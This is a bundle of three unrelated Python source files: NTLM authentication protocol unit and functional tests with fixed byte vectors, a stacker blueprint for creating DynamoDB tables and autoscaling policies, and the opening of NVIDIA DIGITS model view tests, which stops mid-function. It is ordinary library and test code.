        monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
        monkeypatch.setattr('ntlm_auth.messages.get_version', lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
        monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key', lambda: b"\x55" * 16)
        monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp', lambda: b"\x00" * 8)
        ch = 'E3CA49271E5089CC48CE82109F1324F41DBEDDC29A777410C738F7868C4FF405'
        cbt_data = GssChannelBindingsStruct()
        cbt_data[cbt_data.APPLICATION_DATA] = b"tls-server-end-point:" + \
                                              base64.b16decode(ch)
        ntlm_context = NtlmContext("User", "Password", "Domain", "COMPUTER",
                                   cbt_data=cbt_data)
        ntlm_context.reset_rc4_state()  # Verifies it won't fail when the session security isn't set up.
        actual_nego = ntlm_context.step()
        expected_nego = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00" \
                        b"\x01\x00\x00\x00\x31\xb0\x88\xe2" \
                        b"\x06\x00\x06\x00\x28\x00\x00\x00" \
                        b"\x08\x00\x08\x00\x2e\x00\x00\x00" \
                        b"\x05\x01\x28\x0a\x00\x00\x00\x0f" \
                        b"\x44\x6f\x6d\x61\x69\x6e\x43\x4f" \
                        b"\x4d\x50\x55\x54\x45\x52"
        assert actual_nego == expected_nego
        assert not ntlm_context.mic_present
        assert not ntlm_context.complete
        # CHALLENGE with a timestamp AV pair (0x07) which triggers the
        # MIC calculation in the client.
        challenge_msg = b"\x4E\x54\x4C\x4D\x53\x53\x50\x00" \
                        b"\x02\x00\x00\x00\x00\x00\x00\x00" \
                        b"\x38\x00\x00\x00\x33\x82\x8A\xE2" \
                        b"\x01\x23\x45\x67\x89\xAB\xCD\xEF" \
                        b"\x00\x00\x00\x00\x00\x00\x00\x00" \
                        b"\x30\x00\x30\x00\x38\x00\x00\x00" \
                        b"\x06\x01\xB1\x1D\x00\x00\x00\x0F" \
                        b"\x02\x00\x0C\x00\x44\x00\x6F\x00" \
                        b"\x6D\x00\x61\x00\x69\x00\x6E\x00" \
                        b"\x01\x00\x0C\x00\x53\x00\x65\x00" \
                        b"\x72\x00\x76\x00\x65\x00\x72\x00" \
                        b"\x07\x00\x08\x00\x00\x00\x00\x00" \
                        b"\x00\x00\x00\x00\x00\x00\x00\x00"
        actual_auth = ntlm_context.step(challenge_msg)
        expected_auth = b'\x4E\x54\x4C\x4D\x53\x53\x50\x00' \
                        b'\x03\x00\x00\x00\x18\x00\x18\x00' \
                        b'\x7C\x00\x00\x00\x7C\x00\x7C\x00' \
                        b'\x94\x00\x00\x00\x0C\x00\x0C\x00' \
                        b'\x58\x00\x00\x00\x08\x00\x08\x00' \
                        b'\x64\x00\x00\x00\x10\x00\x10\x00' \
                        b'\x6C\x00\x00\x00\x10\x00\x10\x00' \
                        b'\x10\x01\x00\x00\x31\x82\x8A\xE2' \
                        b'\x05\x01\x28\x0A\x00\x00\x00\x0F' \
                        b'\xC4\x45\x2C\xF7\xA8\x1E\x4D\x11' \
                        b'\xD0\x78\x18\x94\x09\x57\x5D\x9E' \
                        b'\x44\x00\x6F\x00\x6D\x00\x61\x00' \
                        b'\x69\x00\x6E\x00\x55\x00\x73\x00' \
                        b'\x65\x00\x72\x00\x43\x00\x4F\x00' \
                        b'\x4D\x00\x50\x00\x55\x00\x54\x00' \
                        b'\x45\x00\x52\x00\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\xA1\x3D\x03\x8A' \
                        b'\xD0\xCA\x02\x64\x33\x89\x7C\x33' \
                        b'\x5E\x0F\x56\xDF\x01\x01\x00\x00' \
                        b'\x00\x00\x00\x00\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\xAA\xAA\xAA\xAA' \
                        b'\xAA\xAA\xAA\xAA\x00\x00\x00\x00' \
                        b'\x02\x00\x0C\x00\x44\x00\x6F\x00' \
                        b'\x6D\x00\x61\x00\x69\x00\x6E\x00' \
                        b'\x01\x00\x0C\x00\x53\x00\x65\x00' \
                        b'\x72\x00\x76\x00\x65\x00\x72\x00' \
                        b'\x07\x00\x08\x00\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\x06\x00\x04\x00' \
                        b'\x02\x00\x00\x00\x0A\x00\x10\x00' \
                        b'\x6E\xA1\x9D\xF0\x66\xDA\x46\x22' \
                        b'\x05\x1F\x9C\x4F\x92\xC6\xDF\x74' \
                        b'\x00\x00\x00\x00\x00\x00\x00\x00' \
                        b'\x1D\x08\x89\xD1\xA5\xEE\xED\x21' \
                        b'\x91\x9E\x1A\xB8\x27\xC3\x0B\x17'
        assert actual_auth == expected_auth
        assert ntlm_context.complete
        assert ntlm_context.mic_present
        request_msg = b"test req"
        response_msg = b"test res"
        actual_wrapped = ntlm_context.wrap(request_msg)
        expected_wrapped = b"\x01\x00\x00\x00\xbc\xe3\x23\xa1" \
                           b"\x72\x06\x23\x78\x00\x00\x00\x00" \
                           b"\x70\x80\x1e\x11\xfe\x6b\x3a\xad"
        assert actual_wrapped == expected_wrapped
        server_sec = SessionSecurity(
            ntlm_context._session_security.negotiate_flags,
            ntlm_context._session_security.exported_session_key, "server"
        )
        server_unwrap = server_sec.unwrap(actual_wrapped[16:],
                                          actual_wrapped[0:16])
        assert server_unwrap == request_msg
        response_wrapped = server_sec.wrap(response_msg)
        actual_unwrap = ntlm_context.unwrap(
            response_wrapped[1] + response_wrapped[0]
        )
        assert actual_unwrap == response_msg
        msg = b"Hello"
        # Signatures carry an incrementing sequence number, so signing
        # the same message twice yields different signatures.
        actual_sig1 = ntlm_context.sign(msg)
        expected_sig1 = b"\x01\x00\x00\x00\x08\xF0\x0D\x86\x34\x05\x1A\x1D\x01\x00\x00\x00"
        assert actual_sig1 == expected_sig1
        server_sec.verify_signature(msg, actual_sig1)
        actual_sig2 = ntlm_context.sign(msg)
        expected_sig2 = b"\x01\x00\x00\x00\x07\x64\x0C\x30\x1C\xD7\x76\xF0\x02\x00\x00\x00"
        assert actual_sig2 == expected_sig2
        server_sec.verify_signature(msg, actual_sig2)
        # After resetting the RC4 state on both ends, signing still
        # interoperates.
        ntlm_context.reset_rc4_state()
        actual_sig3 = ntlm_context.sign(msg)
        expected_sig3 = b"\x01\x00\x00\x00\x1E\xD4\xA3\xE5\xE8\x05\x74\x01\x03\x00\x00\x00"
        assert actual_sig3 == expected_sig3
        server_sec.reset_rc4_state(outgoing=False)
        server_sec.verify_signature(msg, actual_sig3)
        server_sig = server_sec.get_signature(msg)
        ntlm_context.verify(msg, server_sig)
    def test_fail_wrap_no_context(self):
        """wrap/unwrap before authentication raises NoAuthContextError."""
        ntlm_context = NtlmContext("", "")
        with pytest.raises(NoAuthContextError) as err:
            ntlm_context.wrap(b"")
        assert str(err.value) == \
            "Cannot wrap data as no security context has been established"
        with pytest.raises(NoAuthContextError) as err:
            ntlm_context.unwrap(b"")
        assert str(err.value) == \
            "Cannot unwrap data as no security context has been established"
class TestNtlmFunctional(object):
"""
These tests are functional tests to test out the NTLM calculations and
message structures with an actual Microsoft server rather than documented
examples. Because it is reliant on IIS being present this can only run on
the tests on appveyor and not travis-ci or locally. If these tests past it
is a fairly good indication that everything works as expected in a real
life scenario.
This will test out all 4 NTLM compatibility levels (0-3) that affect client
behaviour and test out their response code as well as if we can get the IIS
page's contents. The credentials, urls and expected contents are all set up
in the appveyor/setup_iis.ps1 script. There are 4 types of scenarios that
will be tested with each compatibility level;
1. A HTTP site that has Extended Protection set to None
2. A HTTP site that has Extended Protection set to Require (CBT Required)
3. A HTTPS site that has Extended Protection set to None
4. A HTTPS site that has Extended Protection set to Require (CBT Required)
Theoretically 1 and 2 are the same as CBT is only checked when running over
HTTPS but it is best to verify. Scenario 4 would only work when running
with the compatibility level of 3 as CBT support was only added in NTLMv2
authentication.
"""
@pytest.fixture(scope='class', autouse=True)
def runner(self):
server = os.environ.get('NTLM_SERVER', None)
domain = os.environ.get('NTLM_DOMAIN', '')
username = os.environ.get('NTLM_USERNAME', None)
password = os.environ.get('NTLM_PASSWORD', None)
if server and username and password:
return server, domain, username, password
else:
pytest.skip("NTLM_USERNAME, NTLM_PASSWORD, NTLM_SERVER "
"environment variables were not set, integration "
"tests will be skipped")
def test_ntlm_0_http_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 0)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_0_http_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 0)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_0_https_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 0)
actual_code = actual.status_code
# CBT is not support in ntlm levels less than 3, expected a 401
assert actual_code == 401
def test_ntlm_0_https_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 0)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_1_http_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 1)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_1_http_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 1)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_1_https_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 1)
actual_code = actual.status_code
# CBT is not support in ntlm levels less than 3, expected a 401
assert actual_code == 401
def test_ntlm_1_https_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 1)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_2_http_with_cbt(self, runner):
    # Level 2 over plain HTTP (port 81); auth should succeed.
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 81, 2)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_2_http_without_cbt(self, runner):
    # Level 2 over plain HTTP (port 82); auth should succeed.
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 82, 2)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_2_https_with_cbt(self, runner):
    # CBT is not supported at NTLM levels below 3, so a 401 is expected.
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 441, 2)
    assert response.status_code == 401
def test_ntlm_2_https_without_cbt(self, runner):
    # Level 2 over HTTPS without CBT (port 442); auth should succeed.
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 442, 2)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_http_with_cbt_dep(self, runner):
    # Level 3 (NTLMv2), legacy code path, plain HTTP (port 81).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 81, 3)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_http_without_cbt_dep(self, runner):
    # Level 3 (NTLMv2), legacy code path, plain HTTP (port 82).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 82, 3)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_https_with_cbt_dep(self, runner):
    # Only case where CBT should work, as NTLMv2 is the auth type (level 3).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 441, 3)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_https_without_cbt_dep(self, runner):
    # Level 3 (NTLMv2), legacy code path, HTTPS without CBT (port 442).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 442, 3)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_http_with_cbt(self, runner):
    # Level 3 (NTLMv2), modern NtlmContext path, plain HTTP (port 81).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 81, 3,
                                  legacy=False)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_http_without_cbt(self, runner):
    # Level 3 (NTLMv2), modern NtlmContext path, plain HTTP (port 82).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 82, 3,
                                  legacy=False)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_https_with_cbt(self, runner):
    # Only case where CBT should work, as NTLMv2 is the auth type (level 3).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 441, 3,
                                  legacy=False)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def test_ntlm_3_https_without_cbt(self, runner):
    # Level 3 (NTLMv2), modern NtlmContext path, HTTPS without CBT (port 442).
    server, domain, username, password = runner[0], runner[1], runner[2], runner[3]
    response = self._send_request(server, domain, username, password, 442, 3,
                                  legacy=False)
    assert response.status_code == 200
    assert response.content.decode('utf-8') == "contents"
def _send_request(self, server, domain, username, password, port,
                  ntlm_compatibility, legacy=True):
    """Send a GET for /contents.txt with NTLM credentials and return the
    final response.

    The scheme is derived from the port: 8x ports are plain HTTP, the
    rest are HTTPS (with certificate verification disabled).
    """
    # Silence warnings emitted on older Pythons / unverified TLS
    # connections; each warning class may or may not be importable
    # depending on the installed requests/urllib3 versions.
    try:
        from requests.packages.urllib3.exceptions import \
            InsecurePlatformWarning
        warnings.simplefilter('ignore', category=InsecurePlatformWarning)
    except ImportError:
        pass
    try:
        from requests.packages.urllib3.exceptions import SNIMissingWarning
        warnings.simplefilter('ignore', category=SNIMissingWarning)
    except ImportError:
        pass
    try:
        from urllib3.exceptions import InsecureRequestWarning
        warnings.simplefilter('ignore', category=InsecureRequestWarning)
    except ImportError:
        pass

    scheme = 'http' if str(port).startswith('8') else 'https'
    url = "%s://%s:%d/contents.txt" % (scheme, server, port)

    session = requests.Session()
    session.verify = False
    session.auth = NtlmAuth(domain, username, password, ntlm_compatibility,
                            legacy)
    prepared_request = session.prepare_request(requests.Request('GET', url))
    return session.send(prepared_request)
# used by the functional tests to auth with an NTLM endpoint
class NtlmAuth(AuthBase):
    """requests auth handler that performs the NTLM 3-message handshake.

    Two code paths are implemented: the modern ``NtlmContext`` flow (which
    can carry a channel-binding token built from the server certificate)
    and a legacy ``Ntlm`` flow.
    """

    def __init__(self, domain, username, password, ntlm_compatibility, legacy):
        self.username = username
        self.domain = domain.upper()  # domain is normalised to upper case
        self.password = password
        self.ntlm_compatibility = ntlm_compatibility
        # legacy=True selects the Ntlm class path, False the NtlmContext path
        self.legacy = legacy

    def __call__(self, response):
        # NOTE(review): despite the parameter name, requests invokes auth
        # handlers with the outgoing PreparedRequest (register_hook is a
        # request method) -- confirm.
        response.headers['Connection'] = 'Keep-Alive'
        response.register_hook('response', self.hook)
        return response

    def hook(self, response, **kwargs):
        # Only start the NTLM handshake when the server challenges with 401.
        if response.status_code == 401:
            if self.legacy:
                return self.retry_with_ntlm_auth_legacy('www-authenticate',
                                                        'Authorization',
                                                        response, 'NTLM',
                                                        kwargs)
            else:
                return self.retry_with_ntlm_auth('www-authenticate',
                                                 'Authorization', response,
                                                 'NTLM', kwargs)
        else:
            return response

    def retry_with_ntlm_auth(self, auth_header_field, auth_header, response,
                             auth_type, args):
        """Replay the request through the NTLM negotiate/challenge/authenticate
        exchange using ntlm_auth's NtlmContext, with CBT when available."""
        # Build the channel-binding structure from the server certificate;
        # any failure (e.g. plain HTTP, no TLS socket) falls back to no CBT.
        try:
            cert_hash = self._get_server_cert(response)
            cbt_data = GssChannelBindingsStruct()
            cbt_data[cbt_data.APPLICATION_DATA] = b"tls-server-end-point:" + \
                base64.b16decode(cert_hash)
        except Exception:
            cbt_data = None
        context = NtlmContext(self.username, self.password, self.domain,
                              cbt_data=cbt_data,
                              ntlm_compatibility=self.ntlm_compatibility)

        # Consume the original response contents and release the connection for
        # later (the handshake must reuse the same connection).
        response.content
        response.raw.release_conn()

        # Create the negotiate request
        msg1_req = response.request.copy()
        msg1 = context.step()
        msg1_header = "%s %s" % (auth_type, base64.b64encode(msg1).decode())
        msg1_req.headers[auth_header] = msg1_header

        # Send the negotiate request and receive the challenge message
        disable_stream_args = dict(args, stream=False)
        msg2_resp = response.connection.send(msg1_req, **disable_stream_args)
        msg2_resp.content
        msg2_resp.raw.release_conn()

        # Parse the challenge response in the ntlm_context
        msg2_header = msg2_resp.headers[auth_header_field]
        msg2 = msg2_header.replace(auth_type + ' ', '')
        msg3 = context.step(base64.b64decode(msg2))

        # Create the authenticate request
        msg3_req = msg2_resp.request.copy()
        msg3_header = auth_type + ' ' + base64.b64encode(msg3).decode()
        msg3_req.headers[auth_header] = msg3_header

        # Send the authenticate request
        final_response = msg2_resp.connection.send(msg3_req, **args)
        # Keep the intermediate responses reachable via .history
        final_response.history.append(response)
        final_response.history.append(msg2_resp)
        return final_response

    def retry_with_ntlm_auth_legacy(self, auth_header_field, auth_header,
                                    response, auth_type, args):
        """Same three-leg exchange as retry_with_ntlm_auth, but through the
        legacy Ntlm class (messages are already base64 text)."""
        try:
            cert_hash = self._get_server_cert(response)
        except Exception:
            cert_hash = None
        context = Ntlm(ntlm_compatibility=self.ntlm_compatibility)

        # Consume the original response contents and release the connection for
        # later
        response.content
        response.raw.release_conn()

        # Create the negotiate request
        msg1_req = response.request.copy()
        msg1 = context.create_negotiate_message(self.domain)
        msg1_header = "%s %s" % (auth_type, msg1.decode('ascii'))
        msg1_req.headers[auth_header] = msg1_header

        # Send the negotiate request and receive the challenge message
        disable_stream_args = dict(args, stream=False)
        msg2_resp = response.connection.send(msg1_req, **disable_stream_args)
        msg2_resp.content
        msg2_resp.raw.release_conn()

        # Parse the challenge response in the ntlm_context
        msg2_header = msg2_resp.headers[auth_header_field]
        msg2 = msg2_header.replace(auth_type + ' ', '')
        context.parse_challenge_message(msg2)

        # Create the authenticate request
        msg3_req = msg2_resp.request.copy()
        msg3 = context.create_authenticate_message(
            self.username, self.password, self.domain,
            server_certificate_hash=cert_hash
        )
        msg3_header = auth_type + ' ' + msg3.decode('ascii')
        msg3_req.headers[auth_header] = msg3_header

        # Send the authenticate request
        final_response = msg2_resp.connection.send(msg3_req, **args)
        final_response.history.append(response)
        final_response.history.append(msg2_resp)
        return final_response

    def _get_server_cert(self, response):
        """Return the upper-case hex SHA-256 digest of the server's DER cert.

        Reaches into urllib3/httplib internals to get at the raw socket; the
        attribute path differs between Python 2 and Python 3.
        """
        if sys.version_info > (3, 0):
            socket = response.raw._fp.fp.raw._sock
        else:
            socket = response.raw._fp.fp._sock
        server_certificate = socket.getpeercert(True)
        hash_object = hashlib.sha256(server_certificate)
        server_certificate_hash = hash_object.hexdigest().upper()
        return server_certificate_hash
| |
from stacker.blueprints.base import Blueprint
from stacker.blueprints.variables.types import TroposphereType
from troposphere import (
iam,
applicationautoscaling as aas,
dynamodb,
Ref,
GetAtt,
Output,
Sub,
)
from .policies import (
dynamodb_autoscaling_policy,
)
# TODO: Factor out the below two functions, once this PR is merged:
# https://github.com/cloudtools/awacs/pull/93
# from awacs.helpers.trust import get_application_autoscaling_assumerole_policy
from awacs.helpers.trust import make_simple_assume_policy
def make_service_domain_name(service, region=''):
    """Helper function for creating proper service domain names.

    China's cn-north-1 region uses the .com.cn TLD; everything else .com.
    """
    if region == "cn-north-1":
        suffix = ".com.cn"
    else:
        suffix = ".com"
    return "{}.amazonaws{}".format(service, suffix)
def get_application_autoscaling_assumerole_policy(region=''):
    """Helper function for building the Application Auto Scaling AssumeRole
    policy.

    (The previous docstring said "AWS Lambda"; the trusted service here is
    application-autoscaling.)
    """
    service = make_service_domain_name('application-autoscaling', region)
    return make_simple_assume_policy(service)
# end of TODO.
def snake_to_camel_case(name):
    """
    Accept a snake_case string and return a CamelCase string.
    For example::
        >>> snake_to_camel_case('cidr_block')
        'CidrBlock'

    Hyphens are treated the same as underscores.
    """
    words = name.replace("-", "_").split("_")
    return "".join(w.capitalize() for w in words)
class DynamoDB(Blueprint):
    """Manages the creation of DynamoDB tables.

    Each entry of the ``Tables`` variable is rendered into a
    ``AWS::DynamoDB::Table`` resource; outputs expose the table name and,
    when a StreamSpecification is configured, the stream ARN.

    Example::

      - name: users
        class_path: stacker_blueprints.dynamodb.DynamoDB
        variables:
          Tables:
            UserTable:
              TableName: prod-user-table
              KeySchema:
                - AttributeName: id
                  KeyType: HASH
                - AttributeName: name
                  KeyType: RANGE
              AttributeDefinitions:
                - AttributeName: id
                  AttributeType: S
                - AttributeName: name
                  AttributeType: S
              ProvisionedThroughput:
                ReadCapacityUnits: 5
                WriteCapacityUnits: 5
              StreamSpecification:
                StreamViewType: ALL
    """

    VARIABLES = {
        "Tables": {
            "type": TroposphereType(dynamodb.Table, many=True),
            "description": "DynamoDB tables to create.",
        }
    }

    def create_template(self):
        template = self.template
        tables = self.get_variables()["Tables"]

        for table in tables:
            template.add_resource(table)
            title = table.title
            # only tables with a stream configured get a StreamArn output
            if table.properties.get("StreamSpecification"):
                template.add_output(
                    Output("{}StreamArn".format(title),
                           Value=GetAtt(table, "StreamArn")))
            template.add_output(
                Output("{}Name".format(title), Value=Ref(table)))
class AutoScaling(Blueprint):
    """Manages the AutoScaling of DynamoDB tables.

    Ref: https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-examples-application-autoscaling # noqa

    Example::

      - name: dynamodb-autoscaling
        class_path: stacker_blueprints.dynamodb.AutoScaling
        variables:
          AutoScalingConfigs:
            - table: test-user-table
              read:
                min: 5
                max: 100
                target: 75.0
              write:
                min: 5
                max: 50
                target: 80.0
            - table: test-group-table
              read:
                min: 10
                max: 50
                scale-in-cooldown: 180
                scale-out-cooldown: 180
              write:
                max: 25
    """

    VARIABLES = {
        "AutoScalingConfigs": {
            "type": list,
            "description": "A list of dicts, each of which represent "
                           "a DynamoDB AutoScaling Configuration.",
        }
    }

    # reference: https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-examples-application-autoscaling # noqa
    def create_scaling_iam_role(self):
        # IAM role assumed by Application Auto Scaling, scoped to the tables
        # being managed via dynamodb_autoscaling_policy.
        assumerole_policy = get_application_autoscaling_assumerole_policy()
        return self.template.add_resource(
            iam.Role(
                "Role",
                Policies=[
                    iam.Policy(
                        PolicyName=Sub(
                            "${AWS::StackName}-dynamodb-autoscaling"
                        ),
                        PolicyDocument=dynamodb_autoscaling_policy(self.tables)
                    )
                ],
                AssumeRolePolicyDocument=assumerole_policy
            )
        )

    def create_scalable_target_and_scaling_policy(self, table, asc, capacity_type="read"):  # noqa
        """Create a ScalableTarget plus a target-tracking ScalingPolicy for
        one table's read or write capacity.

        table -- DynamoDB table name (used in the ResourceId and titles)
        asc -- dict of settings: min, max, target, scale-in-cooldown,
               scale-out-cooldown (all optional, with defaults below)
        capacity_type -- "read" or "write"
        """
        capacity_type = capacity_type.title()
        if capacity_type not in ("Read", "Write"):
            raise Exception("capacity_type must be either `read` or `write`.")

        dimension = "dynamodb:table:{}CapacityUnits".format(capacity_type)
        camel_table = snake_to_camel_case(table)
        scalable_target_name = "{}{}ScalableTarget".format(
            camel_table,
            capacity_type,
        )
        scalable_target = self.template.add_resource(
            aas.ScalableTarget(
                scalable_target_name,
                MinCapacity=asc.get("min", 1),
                MaxCapacity=asc.get("max", 1000),
                ResourceId="table/{}".format(table),
                RoleARN=self.iam_role_arn,
                ScalableDimension=dimension,
                ServiceNamespace="dynamodb"
            )
        )

        # https://docs.aws.amazon.com/autoscaling/application/APIReference/API_PredefinedMetricSpecification.html # noqa
        predefined_metric_spec = aas.PredefinedMetricSpecification(
            PredefinedMetricType="DynamoDB{}CapacityUtilization".format(
                capacity_type
            )
        )
        ttspc = aas.TargetTrackingScalingPolicyConfiguration(
            TargetValue=asc.get("target", 50.0),
            ScaleInCooldown=asc.get("scale-in-cooldown", 60),
            ScaleOutCooldown=asc.get("scale-out-cooldown", 60),
            PredefinedMetricSpecification=predefined_metric_spec,
        )
        scaling_policy_name = "{}{}ScalablePolicy".format(
            camel_table,
            capacity_type,
        )
        # dynamodb only supports the TargetTrackingScaling policy type.
        # https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-applicationautoscaling-scalingpolicy.html#cfn-applicationautoscaling-scalingpolicy-policytype # noqa
        self.template.add_resource(
            aas.ScalingPolicy(
                scaling_policy_name,
                PolicyName=scaling_policy_name,
                PolicyType="TargetTrackingScaling",
                ScalingTargetId=scalable_target.ref(),
                TargetTrackingScalingPolicyConfiguration=ttspc,
            )
        )

    def create_template(self):
        variables = self.get_variables()
        self.auto_scaling_configs = variables["AutoScalingConfigs"]
        self.tables = [config["table"] for config in self.auto_scaling_configs]
        self.iam_role = self.create_scaling_iam_role()
        self.iam_role_arn = GetAtt(self.iam_role, "Arn")
        for table_asc in self.auto_scaling_configs:
            # NOTE(review): both "read" and "write" keys are required per
            # config; a config with only one of them raises KeyError here --
            # confirm whether that is intended.
            self.create_scalable_target_and_scaling_policy(
                table_asc["table"], table_asc["read"], "read"
            )
            self.create_scalable_target_and_scaling_policy(
                table_asc["table"], table_asc["write"], "write"
            )
| |
# Copyright (c) 2015, NVIDIA CORPORATION. All rights reserved.
import re
import os
import json
import shutil
import tempfile
import time
import unittest
import itertools
import urllib
import mock
import flask
from gevent import monkey
monkey.patch_all()
from bs4 import BeautifulSoup
import PIL.Image
from urlparse import urlparse
from cStringIO import StringIO
import caffe_pb2
import digits.webapp
import digits.test_views
import digits.dataset.images.generic.test_views
from digits.config import config_value
# May be too short on a slow system
TIMEOUT_DATASET = 45
TIMEOUT_MODEL = 60
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
    """
    Provides some functions
    """
    # Minimal Caffe regression network: scale the input by 0.004, one
    # inner-product layer with 2 outputs, Euclidean loss.
    CAFFE_NETWORK = \
"""
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "train_loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
}
"""

    # Equivalent Torch network, expressed as a Lua chunk.
    TORCH_NETWORK = \
"""
return function(p)
local nDim = 1
if p.inputShape then p.inputShape:apply(function(x) nDim=nDim*x end) end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(nDim, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*h*w -> 2
return {
model = net,
loss = nn.MSECriterion(),
}
end
"""

    @classmethod
    def setUpClass(cls):
        super(BaseViewsTest, cls).setUpClass()
        # Torch tests only make sense when a torch install is configured
        if cls.FRAMEWORK=='torch' and not config_value('torch_root'):
            raise unittest.SkipTest('Torch not found')

    # The following are thin wrappers around the generic job helpers,
    # specialised for the 'models' job type.

    @classmethod
    def model_exists(cls, job_id):
        return cls.job_exists(job_id, 'models')

    @classmethod
    def model_status(cls, job_id):
        return cls.job_status(job_id, 'models')

    @classmethod
    def abort_model(cls, job_id):
        return cls.abort_job(job_id, job_type='models')

    @classmethod
    def model_wait_completion(cls, job_id, **kwargs):
        kwargs['job_type'] = 'models'
        # default to the module-level model timeout
        if 'timeout' not in kwargs:
            kwargs['timeout'] = TIMEOUT_MODEL
        return cls.job_wait_completion(job_id, **kwargs)

    @classmethod
    def delete_model(cls, job_id):
        return cls.delete_job(job_id, job_type='models')

    @classmethod
    def network(cls):
        # pick the network definition matching the framework under test
        return cls.TORCH_NETWORK if cls.FRAMEWORK=='torch' else cls.CAFFE_NETWORK
class BaseViewsTestWithDataset(BaseViewsTest,
                               digits.dataset.images.generic.test_views.BaseViewsTestWithDataset):
    """
    Provides a dataset
    """

    # Inherited classes may want to override these attributes
    CROP_SIZE = None
    TRAIN_EPOCHS = 3
    LR_POLICY = None
    LEARNING_RATE = None

    @classmethod
    def setUpClass(cls):
        super(BaseViewsTestWithDataset, cls).setUpClass()
        # track created model jobs so tearDownClass can delete them
        cls.created_models = []

    @classmethod
    def tearDownClass(cls):
        # delete any created models
        for job_id in cls.created_models:
            cls.delete_model(job_id)
        super(BaseViewsTestWithDataset, cls).tearDownClass()

    @classmethod
    def create_model(cls, learning_rate=None, **kwargs):
        """
        Create a model
        Returns the job_id
        Raise RuntimeError if job fails to create

        Keyword arguments:
        learning_rate -- overrides cls.LEARNING_RATE when given
        **kwargs -- data to be sent with POST request; pass json=True to use
                    the .json endpoint and return the id from the JSON body
        """
        if learning_rate is None:
            learning_rate = cls.LEARNING_RATE
        # baseline form data; kwargs below may override any of these
        data = {
            'model_name': 'test_model',
            'dataset': cls.dataset_id,
            'method': 'custom',
            'custom_network': cls.network(),
            'batch_size': 10,
